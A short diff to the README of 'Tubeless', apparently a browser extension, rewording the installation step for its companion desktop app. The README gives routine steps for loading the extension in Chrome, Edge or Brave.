qalva/tubeless/README.md

 ## Download

 1. Download the [Tubeless Extension](https://github.com/qalva/tubeless/releases/latest) from the Releases page, scroll to the bottom of the latest release, then click the `.zip` file in the **Assets** section to download it.
-2. Download the [Tubeless Desktop](https://www.mediafire.com/file/vi8tolbhgvq2974/TubelessSetup-1.0.1.exe/file) app to unlock media downloading in the Tubeless Extension.
+2. Download and install the [Tubeless Desktop](https://www.mediafire.com/file/vi8tolbhgvq2974/TubelessSetup-1.0.1.exe/file) app to unlock media downloading in the Tubeless Extension.
 3. Open your browser (Chrome / Edge / Brave).
 4. Toggle the three dots button in the toolbar and click on "Extensions" then click on "Manage Extensions" or navigate to `browser_name://extensions` (e.g., `chrome://extensions`) to reach the extensions page
 5. In extensions page, enable Developer Mode